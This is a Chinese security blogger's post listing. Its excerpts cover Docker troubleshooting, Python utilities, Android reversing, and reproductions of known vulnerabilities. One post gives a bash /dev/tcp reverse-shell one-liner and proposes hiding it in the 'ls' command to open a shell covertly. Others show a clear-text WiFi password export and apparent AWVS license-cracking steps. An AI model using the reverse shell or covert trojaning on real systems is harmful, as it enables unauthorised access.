- 博客(114)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 python脚本在linux下怎么在后台一直启动
通过上述步骤,您可以在 CentOS 下将 Python 代码在后台启动,并使用 nohup 命令来忽略终端关闭信号。请注意,nohup 命令运行的程序将不再与终端交互,因此需要适当处理输入和输出。请将 your_script.py 替换为您的 Python 脚本文件名,将 your_log_file.log 替换为您希望保存日志的文件名。如果您想要停止在后台运行的 Python 代码,您可以使用 ps 和 kill 命令来找到和终止相关进程。您可以关闭终端窗口,您的 Python 代码将继续在后台运行。
2023-06-30 11:44:13
1885
原创 Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
网上方法一大堆,我用下面这个方法解决了:报这个错其实是 /etc/docker/daemon.json 里面少了一段代码造成的,我们给他加上就好了(缺少此文件也加上就ok)进入docker目录编辑daemon.json文件:加入这段代码:重启docker问题解决,亲测有效哦~......
2022-06-30 10:52:15
2580
原创 漏洞复现之YApi接口管理平台远程代码执行
1. 简介YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
2022-05-31 15:44:38
1205
原创 逆向工具分享之ApkAnalyser一键提取安卓应用中可能存在的敏感信息
ApkAnalyser一键提取安卓应用中可能存在的敏感信息。用法懒人做法,将所有app放到程序自动创建的apps目录,再运行apkAnalyser.exe主程序就好了,不用加参数。功能目前提取了APK内:所有字符串所有URLs所有ip可能是hash值的字符串存在的敏感词(如oss.aliyun)可能是accessKey的值使用Python开发,依赖于apkutils模块,可执行文件使用pyinstaller打包。链接:https://github.com/TheKingOfDu
2022-05-31 15:23:03
1130
原创 漏洞复现之CVE-2018-1273 Spring Data Commons 远程命令执行
漏洞背景Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。实验环境攻击机:Win 10靶场:kali中搭建vulhub靶场https://github.com/vulhub/vulhub/spring/CVE-2018-1273影响版本Sp
2022-04-27 18:49:07
1111
原创 启动docker时:ERROR: Couldn’t connect to Docker daemon at http+docker://localunixsocket - is it running?
出现这个问题是因为当前用户权限的问题,只要将当前用户加入docker组就可以啦~解决方案:1、如果还没有 docker group 就添加一个sudo groupadd docker2、将用户加入该 group 内。然后退出并重新登录就生效啦。sudo gpasswd -a ${USER} docker3、重启 docker 服务sudo service docker restart4、切换当前会话到新 group 或者重启 X 会话newgrp - docker注意:最后一步是必须的,
2022-04-27 17:28:23
8239
原创 安卓逆向之查脱壳操作
查脱壳操作https://github.com/slimm609/checksec.sh --bash。用于检查可执行文件的属性。goodjob。https://mp.weixin.qq.com/s/-ljFc5sBn9Sq92Pboy0SWQ --傻瓜式脱壳保姆级教学http://www.legendsec.org/1888.html --pkid查壳工具,APK查壳工具PKID ApkScan-PKID。P:DetectItEasy;–https://github.com/rednaga/APK
2022-04-25 19:48:37
3680
1
原创 漏洞复现之Spring Boot 目录遍历 (CVE-2021_21234)
漏洞背景spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过
2022-04-25 17:22:43
4632
原创 Android APP漏洞自动化静态扫描检测工具-Qark
快速 Android 审查工具包此工具旨在查找源代码或打包 APK 中的多个与安全相关的 Android 应用程序漏洞。该工具还能够创建“概念验证”可部署的 APK 和/或 ADB 命令,能够利用它发现的许多漏洞。无需 root 测试设备,因为该工具专注于可以在其他安全条件下利用的漏洞。要求在 Python 2.7.13 和 3.6 上测试 在 OSX、Linux 和 Windows 上测试用法有关更多选项,请参阅–help命令。APK:~ qark --apk path/to/my.apk
2022-04-22 19:41:06
9203
原创 牛客网算法篇之面试必刷TOP101之链表
BM1 反转链表描述给定一个单链表的头结点pHead(该头节点是有值的,比如在下图,它的val是1),长度为n,反转该链表后,返回新链表的表头。数据范围: 0\leq n\leq10000≤n≤1000要求:空间复杂度 O(1)O(1) ,时间复杂度 O(n)O(n) 。如当输入链表{1,2,3}时,经反转后,原链表变为{3,2,1},所以对应的输出为{3,2,1}。以上转换过程如下图所示:题解思路将链表反转,就是将每个表元的指针从向后变成向前,那我们可以遍历原始链表,将遇到的节点一一指
2022-04-22 17:41:36
939
原创 Python提取json文件内容,json转SCV最简单方法,地主家的乖宝宝都会用~
一、json转csv :将json中的数据转换成csv文件import jsonimport csv"""需求:将json中的数据转换成csv文件"""def json_to_csv(): # 1.分别 读,创建文件 json_fp = open("word.json", "r",encoding='utf-8') csv_fp = open("word.csv", "w",encoding='utf-8',newline='') # 2.提出表头和表的内容
2022-04-22 14:48:25
1654
原创 AWVS批量扫描-妈妈再也不用担心我不会用awvs批量扫描了
详细信息:https://www.acunetix.com/blog/news/acunetix-v13-release/直接下一步安装就可以了;1、wvsc.exe覆盖到“C:\Program Files (x86)\Acunetix\13.0.200205121\2、license_info.json覆盖到“C:\ProgramData\Acunetix\shared\license”然后记得点击属性改成只读。下载地址:windows:https://pan.baidu.com/s/1sPE
2022-04-22 11:38:16
8507
2
原创 Python实现从url中提取域名的几种方法
方法一:(python3适用)from urllib.parse import urlparsedef url_to_domain(url): o = urlparse(url) domain = o.hostname return domainurls = [ "http://meiwen.me/src/index.html", "http://1000chi.com/game/index.html", "http://see.xidian.edu.cn/cpp/h
2022-04-21 14:44:04
3958
原创 漏洞复现之CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)
1.1.1 漏洞描述在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、
2022-04-19 15:55:01
3867
1
原创 挖洞思路:前端源码泄露漏洞并用source map文件还原
一、找到含.map的js页面进入到一个*.js的页面查看源码:选一个点进去拉到最下面:后缀加上.map访问https://xxx.js.map会直接下载app.91c9e19843b6a38f9ff5.js.map二、source map文件还原reverse-sourcemap这个工具,两年前发布的,居然文件和目录都能全部还原出来,牛逼。全局安装npm install --global reverse-sourcemap然后( -o 后面跟的是还原后的目录)reverse-so
2022-04-18 19:48:37
24409
2
原创 移动安全资料集锦
基础安全https://github.com/euphrat1ca/Security-List移动端资源https://search.f-droid.org/ --开源安卓应用去中心化分发https://www.apkmirror.com --谷歌安装包镜像https://apkpure.com/cn --三方+Google playhttps://cn.aptoide.com --应用分发Google ->APK Downloader --chrome拓展 Google play源移
2022-04-18 19:36:14
1174
转载 APK脱壳之—如何脱掉“梆梆加固”的保护壳
一、前言现如今Android用户的安全意识不是很强,又有一些恶意开发者利用应用的名字吸引眼球,包装一个恶意锁机收费的应用,在用户被骗的安装应用之后,立马手机锁机,需要付费方可解锁。这样的恶意软件是非常让人痛恨的。所以本文就用一个案例来分析如何破解这类应用,获取解锁密码,让被骗的用户可以找回爽快!二、分析软件锁机原理本文用的是一款叫做:安卓性能激活.apk,关于样本apk文件后面会给出下载地址,从名字可以看到它肯定不会是一个恶意软件,但是当我们安装的时候,并且激活它的权限之后就完了。下面不多说了,直接用
2022-04-18 18:25:33
10810
1
原创 Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)遵纪守法任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益漏洞描述:Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问ActuatorAPI的情况下,将可以利用该漏洞执行任意命令。漏洞影响:3.1.0、 3.0
2022-03-15 19:50:21
1544
转载 centos上部署ElasticSearch
安装部署:https://www.cnblogs.com/we14578/p/10103960.html排错:https://www.cnblogs.com/007sx/p/10098502.htmlhttps://blog.youkuaiyun.com/fiy_fish/article/details/108501550https://blog.youkuaiyun.com/weixin_34345560/article/details/93095521https://blog.youkuaiyun.com/lxw1844912
2022-03-01 15:24:50
214
转载 CVE-2021-22205 Gitlab Rce漏洞复现与检测利用工具
http://blog.seals6.top/index.php/archives/14/
2022-02-16 16:52:01
834
原创 漏洞复现:CVE-2021-3493
漏洞简介#Linux 内核中 overlayfs 文件系统是 Ubuntu的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限影响版本#ubuntu 20.04ubuntu 16.04ubuntu18.04ubuntu 14.04本次复现为ubuntu20.04版本漏洞复现#test@linux:~# git clone https://github.com/ASkyeye/CVE-
2022-02-16 14:29:15
3100
转载 Mac OS下使用rz和sz 上传下载文件
https://www.hangge.com/blog/cache/detail_2397.htmlhttps://www.jianshu.com/p/1166eb16413a
2021-12-16 10:29:12
376
原创 python正则匹配手机号和车牌号
匹配手机号res = re.match('^((13[0-9])|(14[5,7])|(15[0-3,5-9])|(17[0,3,5-8])|(18[0-9])|166|198|199|(147))\d{8}$',"13145627631")if res: print("匹配到手机号,敏感!")else: print("没匹配到手机号,安全。")匹配车牌号car_search = r'[京津沪渝冀豫云辽黑湘皖鲁新苏浙赣鄂桂甘晋蒙陕吉闽贵粤青藏川宁台琼使领军北南成广沈济空海]{1}
2021-09-01 15:41:52
924
2
原创 渗透测试之网站cms识别大法汇总
云悉相信大家都知道,但其库总有限。再给大家介绍kali自带的一款工具— whatweb一、安装命令:apt-get insatll whatweb二、用法:1、扫描单个目标whatweb www.xxx.com2、扫描多个目标,并将结果保存在txt新建xxx文件,输入多个目标地址,保存whatweb -i xxx --log-brief=111.txt......
2021-04-13 16:58:25
20271
1
原创 HTTP与HTTPS的区别
超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。 为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超文本传输协议HTTPS,为了数据传输的安全,HTTPS在HTTP的基础上加入了SSL协议,SSL依靠证书来验证服务器的身份,并为浏览器和服务器之间的通
2021-04-13 16:02:44
485
转载 linux定时任务at,batch和crontab
https://blog.youkuaiyun.com/kx_nullpointer/article/details/21299873
2021-04-11 16:28:50
210
原创 教你如何一条命令找到电脑上的wifi密码
我在这里介绍电脑上查看WiFi密码的方式为cmd命令,命令就两条:netsh wlan show profilenetsh wlan export profile folder=C:\ key=clear具体实现方法如下:1.首先从左下角的搜索出输入cmd2.以管理员身份运行3.输入 netsh wlan show profile 命令查看接口wlan上的wifi的信息4.输入 netsh wlan export profile folder=C:\ key=clear 把配置文
2021-01-25 11:52:01
721
原创 解决pip使用异常No module named ‘pip‘
在使用pip进行升级时提示:No module named ‘pip’解决方法:排除系统变量问题后,如果不是因为Python2和Python3版本的问题,可以在Windows下使用以下命令修复pippython -m ensurepip修复成功了,升级pip试试:python -m pip install --upgrade pip -i http://pypi.douban.com/simple --trusted-host pypi.douban.com问题解决!...
2021-01-21 17:30:03
441
原创 CTF-Vulnhub-XXE安全真题复现-检测,利用,拓展,实战
靶场网址:https://www.vulnhub.com/?q=xxe靶场环境下载:https://download.vulnhub.com/xxe/XXE.zip1.利用nmap扫出目标靶机ip等信息靶场环境下载、解压并安装后,并不知道靶机的账号和密码信息,因为和kali主机是在同一网段,那么可以考虑用nmap知道靶机的ip和其他信息,结果如下:2.提取关键信息并利用直接访问网页xxe目录(有登录信息)随便输账号密码bp抓包可知为xml数据格式,接下来对它进行攻击读取xxe.p
2021-01-07 21:22:25
855
原创 几种Linux下反弹shell的方法
在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行nc -lvp port表示显示执行过程监听端口在目标主机上执行bash -i >& /dev/tcp/ip/port 0>$1(扩展:可以把此命令嵌入到常用的 ls 命令,神不知鬼不觉的让对方给你建立一个反弹shell,岂不妙哉!)这样就可以在我们的主机上执行命令了二、nc和python在我
2020-12-25 20:33:55
296
原创 漏洞复现之 Apache HTTPD 多后缀解析漏洞
漏洞简介: Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器:AddHandler ap
2020-12-25 20:24:28
427
FastAPI 框架精讲
2022-12-05
B站武沛齐Django笔记和代码
2022-07-19
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人